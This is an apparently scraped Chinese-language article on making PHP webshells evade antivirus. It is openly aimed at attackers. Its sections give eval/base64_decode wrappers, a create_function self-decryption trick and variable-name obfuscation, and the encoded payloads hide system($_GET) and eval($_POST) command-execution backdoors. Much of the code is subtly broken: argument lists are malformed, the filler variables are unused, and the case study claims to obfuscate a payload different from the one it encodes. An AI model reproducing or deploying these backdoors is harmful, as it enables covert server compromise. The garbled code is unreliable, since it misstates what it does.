PHP木马免杀的一些总结

随着网络安全技术的快速发展，传统的PHP木马已经被杀毒软件所检测出来。因此，为了保证攻击的成功，攻击者需要使用一些技术手段来免杀PHP木马。

一、常见免杀方法

1. 变形加密

变形加密是将一段代码通过算法加密后再传送到服务器，然后在服务器端解密并执行。常见的加密算法有Base64、RC4、AES等加密算法。

例如，以下代码使用Base64加密：

```

eval(base64_decode('c3lzdGVtKCRfR0VUWyJiIiwgIiIpKTs='));

```

2. 自解密

自解密技术是将加密的代码和解密函数放在一起，服务器端直接执行解密函数，使得代码不易被检测出。

例如，以下代码使用自解密技术：

```

$str = '密文';

$func = create_function('$str', 'eval(gzinflate(base64_decode($str)));');

$func(str_rot13(base64_encode(gzdeflate($str))));

```

3. 变量混淆

变量混淆是将变量名进行混淆，使得代码难以被检测出。

例如，以下代码使用变量混淆技术：

```

$_0=strrev("edoced_46esab");

$_1='abc';

$_2='efgh';

$_3='ijkl';

$_4='mnop';

$_5='qrst';

$_6='uvwx';

$_7='yz';

$_8=$_1.$_3.$_3.$_6.$_7;

$_9=$_4.$_1.$_5.$_5.$_8.$_7;

$_10=$_7.$_4.$_6.$_4.$_8.$_5.$_5;

eval($_0("ZXZhbCgkX1BPU1RbInN0ciIsICJwIik7"));

```

二、使用方法

使用免杀PHP木马需要注意以下几点：

1. 选择合适的加密算法，能够有效地加密代码。

2. 注意代码的编写，免杀代码需要保证正确性，否则可能会引起漏洞或者不可预知的后果。

3. 避免被检测出来。攻击者需要了解当前杀毒软件的检测规则，使用合适的免杀方法，使得代码难以被检测出来。

三、案例说明

以下是一段使用变量混淆技术的PHP木马：

```

$_0=strrev("edoced_46esab");

$_1='abc';

$_2='efgh';

$_3='ijkl';

$_4='mnop';

$_5='qrst';

$_6='uvwx';

$_7='yz';

$_8=$_1.$_3.$_3.$_6.$_7;

$_9=$_4.$_1.$_5.$_5.$_8.$_7;

$_10=$_7.$_4.$_6.$_4.$_8.$_5.$_5;

eval($_0("ZXZhbCgkX1BPU1RbInN0ciIsICJwIik7"));

?>

```

本代码通过变量混淆技术，将eval(base64_decode('c3lzdGVtKCRfR0VUWyJiIiwgIiIpKTs='));这段代码免杀，使得木马难以被杀毒软件检测出来。

四、总结

为了保证攻击的成功，攻击者需要使用一些免杀技术来使得代码难以被检测出来。在使用免杀PHP木马时，需要注意选择合适的加密算法，保证代码的正确性，并避免被检测出来。 如果你喜欢我们三七知识分享网站的文章， 欢迎您分享或收藏知识分享网站文章 欢迎您到我们的网站逛逛喔！https://www.37seo.cn/